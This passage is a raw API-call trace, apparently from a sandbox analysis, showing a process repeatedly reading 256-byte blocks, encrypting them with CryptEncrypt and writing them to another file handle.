lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.333] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.333] GetLastError () returned 0x0 [0163.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.333] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.333] GetLastError () returned 0x0 [0163.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.333] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.333] GetLastError () returned 0x0 [0163.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.334] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.334] GetLastError () returned 0x0 [0163.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.334] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.334] GetLastError () returned 0x0 [0163.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.334] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.334] GetLastError () returned 0x0 [0163.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.334] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.334] GetLastError () returned 0x0 [0163.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.334] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.334] GetLastError () returned 0x0 [0163.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.334] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.334] GetLastError () returned 0x0 [0163.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.335] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.335] GetLastError () returned 0x0 [0163.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.335] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.335] GetLastError () returned 0x0 [0163.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.335] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.335] GetLastError () returned 0x0 [0163.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.335] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.335] GetLastError () returned 0x0 [0163.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.335] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.335] GetLastError () returned 0x0 [0163.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.335] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.335] GetLastError () returned 0x0 [0163.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.336] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.336] GetLastError () returned 0x0 [0163.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.336] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.336] GetLastError () returned 0x0 [0163.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.336] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.336] GetLastError () returned 0x0 [0163.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.336] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.336] GetLastError () returned 0x0 [0163.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.336] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.336] GetLastError () returned 0x0 [0163.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.336] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.336] GetLastError () returned 0x0 [0163.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.336] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.336] GetLastError () returned 0x0 [0163.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.337] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.337] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.337] GetLastError () returned 0x0 [0163.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.337] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.337] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.337] GetLastError () returned 0x0 [0163.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.337] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.337] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.337] GetLastError () returned 0x0 [0163.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.337] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.337] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.337] GetLastError () returned 0x0 [0163.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.337] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.337] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.337] GetLastError () returned 0x0 [0163.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.337] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.337] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.337] GetLastError () returned 0x0 [0163.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.338] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.338] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.338] GetLastError () returned 0x0 [0163.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.338] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.338] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.338] GetLastError () returned 0x0 [0163.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.338] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.338] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.338] GetLastError () returned 0x0 [0163.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.338] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.338] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.338] GetLastError () returned 0x0 [0163.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.338] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, 